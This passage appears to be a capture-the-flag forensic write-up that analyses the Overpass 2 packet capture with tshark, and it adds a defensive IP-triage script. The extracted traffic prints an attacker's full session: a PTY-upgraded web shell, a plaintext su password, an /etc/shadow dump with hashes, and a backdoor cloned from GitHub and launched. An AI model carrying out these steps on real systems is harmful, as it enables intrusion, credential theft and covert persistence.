    [Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_6e:18:17 (00:0c:29:6e:18:17), Dst: VMware_17:ba:48 (00:0c:29:17:ba:48)
    Destination: VMware_17:ba:48 (00:0c:29:17:ba:48)
        Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: VMware_6e:18:17 (00:0c:29:6e:18:17)
        Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 60
    Identification: 0x0000 (0)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x643a [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 192.168.170.159
    Destination Address: 192.168.170.145
Transmission Control Protocol, Src Port: 80, Dst Port: 47732, Seq: 0, Ack: 1, Len: 0
    Source Port: 80
    Destination Port: 47732
    [Stream index: 0]
    [Conversation completeness: Incomplete, SYN_SENT (1)]
    [TCP Segment Len: 0]
    Sequence Number: 0    (relative sequence number)
    Sequence Number (raw): 3813293411
    [Next Sequence Number: 1    (relative sequence number)]
    Acknowledgment Number: 1    (relative ack number)
    Acknowledgment number (raw): 2491250219
    1010 .... = Header Length: 40 bytes (10)
    Flags: 0x012 (SYN, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 0... = Push: Not set
        .... .... .0.. = Reset: Not set
        .... .... ..1. = Syn: Set
            [Expert Info (Chat/Sequence): Connection establish acknowledge (SYN+ACK): server port 80]
                [Connection establish acknowledge (SYN+ACK): server port 80]
                [Severity level: Chat]
                [Group: Sequence]
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······A··S·]
    Window: 65160
    [Calculated window size: 65160]
    Checksum: 0x004c [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (20 bytes), Maximum segment size, SACK permitted, Timestamps, No-Operation (NOP), Window scale
        TCP Option - Maximum segment size: 1460 bytes
            Kind: Maximum Segment Size (2)
            Length: 4
            MSS Value: 1460
        TCP Option - SACK permitted
            Kind: SACK Permitted (4)
            Length: 2
        TCP Option - Timestamps
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 894438874: TSval 894438874, TSecr 3256059711
            Timestamp echo reply: 3256059711
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Window scale: 7 (multiply by 128)
            Kind: Window Scale (3)
            Length: 3
            Shift count: 7
            [Multiplier: 128]
    [Timestamps]
        [Time since first frame in this TCP stream: 0.000122542 seconds]
        [Time since previous frame in this TCP stream: 0.000122542 seconds]
    [SEQ/ACK analysis]
        [This is an ACK to the segment in frame: 1]
        [The RTT to ACK the segment was: 0.000122542 seconds]

Frame 3: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) on interface ens33, id 0
    Section number: 1
    Interface id: 0 (ens33)
        Interface name: ens33
    Encapsulation type: Ethernet (1)
    Arrival Time: Jul 21, 2020 17:33:53.162441018 -03
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1595363633.162441018 seconds
    [Time delta from previous captured frame: 0.000089312 seconds]
    [Time delta from previous displayed frame: 0.000089312 seconds]
    [Time since reference or first frame: 0.000211854 seconds]
    Frame Number: 3
    Frame Length: 66 bytes (528 bits)
    Capture Length: 66 bytes (528 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_17:ba:48 (00:0c:29:17:ba:48), Dst: VMware_6e:18:17 (00:0c:29:6e:18:17)
    Destination: VMware_6e:18:17 (00:0c:29:6e:18:17)
        Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: VMware_17:ba:48 (00:0c:29:17:ba:48)
        Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)

CONTINUES.......................

WE LOOK AT THE CONNECTION STATISTICS FOR OUR HOST IP; apart from the connections from the attacker's IP, there is another suspicious one: 140.82.118.4:

┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -z ip_hosts,tree 



=================================================================================================================================
IPv4 Statistics/All Addresses:
Topic / Item      Count         Average       Min Val       Max Val       Rate (ms)     Percent       Burst Rate    Burst Start  
---------------------------------------------------------------------------------------------------------------------------------
All Addresses     3865                                                    0,0134        100%          0,9300        139,353      
 192.168.170.159  3840                                                    0,0133        99,35%        0,9300        139,353      
 140.82.118.4     3228                                                    0,0112        83,52%        0,9300        139,353      
 192.168.170.145  608                                                     0,0021        15,73%        0,4600        229,070      
 192.168.170.1    21                                                      0,0001        0,54%         0,0600        173,637      
 239.255.255.250  14                                                      0,0000        0,36%         0,0100        137,256      
 224.0.0.251      4                                                       0,0000        0,10%         0,0400        173,649      
 192.168.170.2    4                                                       0,0000        0,10%         0,0400        130,813      
 192.168.170.138  4                                                       0,0000        0,10%         0,0200        40,711       
 224.0.0.22       3                                                       0,0000        0,08%         0,0200        173,637      
 91.189.91.157    2                                                       0,0000        0,05%         0,0200        92,969       
 192.168.170.254  2                                                       0,0000        0,05%         0,0200        40,711       

--------------------------------------------------------------------------------------------------------------------------------
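The table above is the kind of output a reviewer should triage automatically: local and multicast addresses are expected noise on a lab segment, so only the public ones need an explanation. The capture itself explains both of them (the DNS answer earlier in the capture resolves github.com to 140.82.118.4, and NTP traffic to 91.189.91.157 appears before that). The script below is an added example, not part of the original write-up or of tshark: it parses the `-z ip_hosts,tree` text (the sample rows are copied from the table above), normalises the locale decimal separator in the percent column, and lists the public addresses ranked by packet count.

```python
"""Triage of `tshark -z ip_hosts,tree` output: rank addresses and flag public ones."""
import ipaddress

# Constructed sample: the address rows of the statistics table shown above
# (counts and percentages copied from the tshark output on this page).
SAMPLE_IP_HOSTS = """\
IPv4 Statistics/All Addresses:
Topic / Item      Count         Average       Min Val       Max Val       Rate (ms)     Percent       Burst Rate    Burst Start
---------------------------------------------------------------------------------------------------------------------------------
All Addresses     3865                                                    0,0134        100%          0,9300        139,353
 192.168.170.159  3840                                                    0,0133        99,35%        0,9300        139,353
 140.82.118.4     3228                                                    0,0112        83,52%        0,9300        139,353
 192.168.170.145  608                                                     0,0021        15,73%        0,4600        229,070
 192.168.170.1    21                                                      0,0001        0,54%         0,0600        173,637
 239.255.255.250  14                                                      0,0000        0,36%         0,0100        137,256
 224.0.0.251      4                                                       0,0000        0,10%         0,0400        173,649
 192.168.170.2    4                                                       0,0000        0,10%         0,0400        130,813
 192.168.170.138  4                                                       0,0000        0,10%         0,0200        40,711
 224.0.0.22       3                                                       0,0000        0,08%         0,0200        173,637
 91.189.91.157    2                                                       0,0000        0,05%         0,0200        92,969
 192.168.170.254  2                                                       0,0000        0,05%         0,0200        40,711
"""


def classify(addr: ipaddress.IPv4Address) -> str:
    """Bucket an address so a reviewer can skip the expected local noise."""
    if addr.is_multicast:
        return "multicast"
    if addr.is_private or addr.is_link_local or addr.is_loopback:
        return "local"
    return "public"


def parse_ip_hosts(text: str):
    """Parse the address rows of the tree into dicts with address, count,
    percent and class. Header, separator and 'All Addresses' rows are skipped
    because their first field is not an IP address. tshark prints decimals
    with the locale separator (a comma here), so the percent column is
    normalised before conversion."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # not an address row
        count = int(parts[1])
        pct_field = next((p for p in parts if p.endswith("%")), "0%")
        percent = float(pct_field.rstrip("%").replace(",", "."))
        rows.append({"address": str(addr), "count": count,
                     "percent": percent, "class": classify(addr)})
    rows.sort(key=lambda r: r["count"], reverse=True)
    return rows


def public_addresses(text: str):
    """Public addresses the capture host talked to, highest packet count first.
    On a lab segment every entry returned here needs an explanation from the
    capture itself (a DNS answer, a known package mirror, ...)."""
    return [(r["address"], r["count"])
            for r in parse_ip_hosts(text) if r["class"] == "public"]


if __name__ == "__main__":
    for addr, count in public_addresses(SAMPLE_IP_HOSTS):
        print(f"{addr:16} {count:6d} packets  <- external, explain this")
```

Run against the real output with `tshark -r overpass2.pcapng -z ip_hosts,tree -q` piped into the script; the two public entries it returns for this capture are exactly the two that the DNS and NTP packets account for.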

WE SHOW ONLY THE HEADER THIS WAY, WITH -q AND PIPING TO head, IN THIS CASE FOR THE ENDPOINTS:

┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -z endpoints,eth0 -q | head
Running as user "root" and group "root". This could be dangerous.
================================================================================
Ethernet Endpoints
Filter:<No Filter>
                       |  Packets  | |  Bytes  | | Tx Packets | | Tx Bytes | | Rx Packets | | Rx Bytes |
VMware_6e:18:17             3843       3753721       1729          185301        2114         3568420   
VMware_f9:85:10             3240       3564469       1771         3475258        1469           89211   
VMware_17:ba:48              610        189696        347           93432         263           96264   
VMware_c0:00:08               42         21154         42           21154           0               0   
IPv6mcast_0c                  14         10052          0               0          14           10052   
IPv4mcast_7f:ff:fa            14          9772          0               0          14            9772  

WE FILTER TO GET MORE SPECIFIC INFORMATION FROM THE ASCII OF EACH PACKET, AND WE SEE /etc/shadow READ AS JAMES, MANY COMMANDS IN THE CLEAR, AND ALSO THE PLAINTEXT PASSWORD (su james Password: whenevernoteartinstant) AND MUCH MORE:

┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p   
Running as user "root" and group "root". This could be dangerous.
Upload File/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh
ls -lAh
total 8.0K
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: whenevernoteartinstant

james@overpass-production:/var/www/html/development/uploads$ cd ~
cd ~
james@overpass-production:~$ sudo -l]
sudo -l]
sudo: invalid option -- ']'
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
            [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
            prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
            prompt] [-T timeout] [-u user] file ...
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant

Matching Defaults entries for james on overpass-production:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on overpass-production:
    (ALL : ALL) ALL
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
<git clone https://github.com/NinjaJc01/ssh-backdoor
Cloning into 'ssh-backdoor'...
remote: Enumerating objects: 18, done.
[WS-Discovery SOAP envelopes and binary data interleaved here by the stream extraction; not recoverable as text]
remote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0
Unpacking objects: 100% (18/18), done.
james@overpass-production:~$ cd ssh-backdoor
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa
id_rsa
Enter passphrase (empty for no passphrase): 

Enter same passphrase again: 

Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production
The key's randomart image is:
+---[RSA 2048]----+
|        .. .     |
|       .  +      |
|      o   .=.    |
|     . o  o+.    |
|      + S +.     |
|     =.o %.      |
|    ..*.% =.     |
|    .+.X+*.+     |
|   .oo=++=Eo.    |
+----[SHA256]-----+
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
chmod +x backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
[SSH key exchange (KEXINIT algorithm lists) and encrypted session data follow; not recoverable as text]
\���N:��?u��-   �\*���U�@7X�L_�|��b����p�'��\Fbͺ�t�gsMD�
                                                        �r44�;��;�L-��zm���Ŵh]����a���b��g|ý��hb:���w���*����M#i/_���?$h�i�4gBt�TI�jv�z����N&G���=`�����▒���0�9▒1���c=yK�Y��ZW�d}|��������Ƿh}��=�Ѧ�׷���{b�#�z�°�����I���R����޵�f�t�(��-\�;T����8▒�P1�
                                                                                                                    c(�ՃP۸+vg�B��ܗ����W}}%63�q�y1z-��qh��`G-���T�Ⱦ���▒Y���@ib��z-���O�$V�d+�Nڢߔ�-��5^�i���i�8
U���"���Dh�,��Y3k�5��O��l>�(�Zl�&����3����V�?L�(�}����,B�;���*Ze�^▒������|hߩ�G�LJ%m9���{(��D(F▒F���N��,  �
                                  ����˓(0�t>iC��˝�2�Lwj������)d�b�����#��#
��Gas3T9�>�^�!l��x R�8��]S �tu`܉F�o�LC����h,=d�C�Y�]����Ŋm�aH�ٷ�g�����0���1�?�ox�?� �S���xM���*
                                                                                               ▒pM=e2��9Ӻl��4�3}�ݥ�
���h3ҙ�7��
          �     ��ڼԯ��c�lI��/�W��(q^�%��@����e�������a���Q�d��*�s�������-C��!��Y���ʻ08�c����5l��Š����K���n�O�]��Ԛh����Y��v� ��)=&!��Π���z���(wH�3j�J�zڝ�$�B����}�Ђ���Z�M\���!�jI��>n�uv  �۾j'�������^�B}?�I��=���@M�4]�.ϙ��>2����X�j��I���ȃ��R�|�h�I�.n��.����%��.b$1���>�䋎y��E�71S��5#c�`��]    }��?]��Lw��?W[��Х%U�ʺ.+k 






USING ALMOST THE SAME COMMAND WITH THE FILTER, BUT PIPED THROUGH STRINGS SO THAT ONLY READABLE PLAIN-TEXT STRINGS ARE SHOWN, WE SEE THE OUTPUT MUCH MORE CLEANLY AND WE SEE THE PASSWORD THE ATTACKER USED IN THE COMMAND FOR PRIVESC: (whenevernoteartinstant):

┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings
Running as user "root" and group "root". This could be dangerous.
Upload File/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh
ls -lAh
total 8.0K
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: whenevernoteartinstant
james@overpass-production:/var/www/html/development/uploads$ cd ~
cd ~
james@overpass-production:~$ sudo -l]
sudo -l]
sudo: invalid option -- ']'
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
            [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
            prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
            prompt] [-T timeout] [-u user] file ...
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant
Matching Defaults entries for james on overpass-production:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on overpass-production:
    (ALL : ALL) ALL
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
<git clone https://github.com/NinjaJc01/ssh-backdoor
Cloning into 'ssh-backdoor'...
remote: Enumerating objects: 18, done.        
remote: Counting objects:   5% (1/18)        
Unpacking objects:   5% (1/18)   
Unpacking objects:  11% (2/18)   
Unpacking objects:  16% (3/18)   
Unpacking objects:  22% (4/18)   
Unpacking objects:  27% (5/18)   
Unpacking objects:  33% (6/18)   
Unpacking objects:  38% (7/18)   
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" 
encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" 
encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>#Ro>
N+7,
PF_q
%Z.f)
rmO{
PP!"
mNvW
)Jo!
(0-g
N.4t
AOfty
VI~d
        +qE
Eremote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0        
Unpacking objects:  44% (8/18)   
Unpacking objects:  50% (9/18)   
Unpacking objects:  55% (10/18)   
Unpacking objects:  61% (11/18)   
Unpacking objects:  66% (12/18)   
Unpacking objects:  72% (13/18)   
Unpacking objects:  77% (14/18)   
Unpacking objects:  83% (15/18)   
Unpacking objects:  88% (16/18)   
Unpacking objects:  94% (17/18)   
Unpacking objects: 100% (18/18)   
Unpacking objects: 100% (18/18), done.
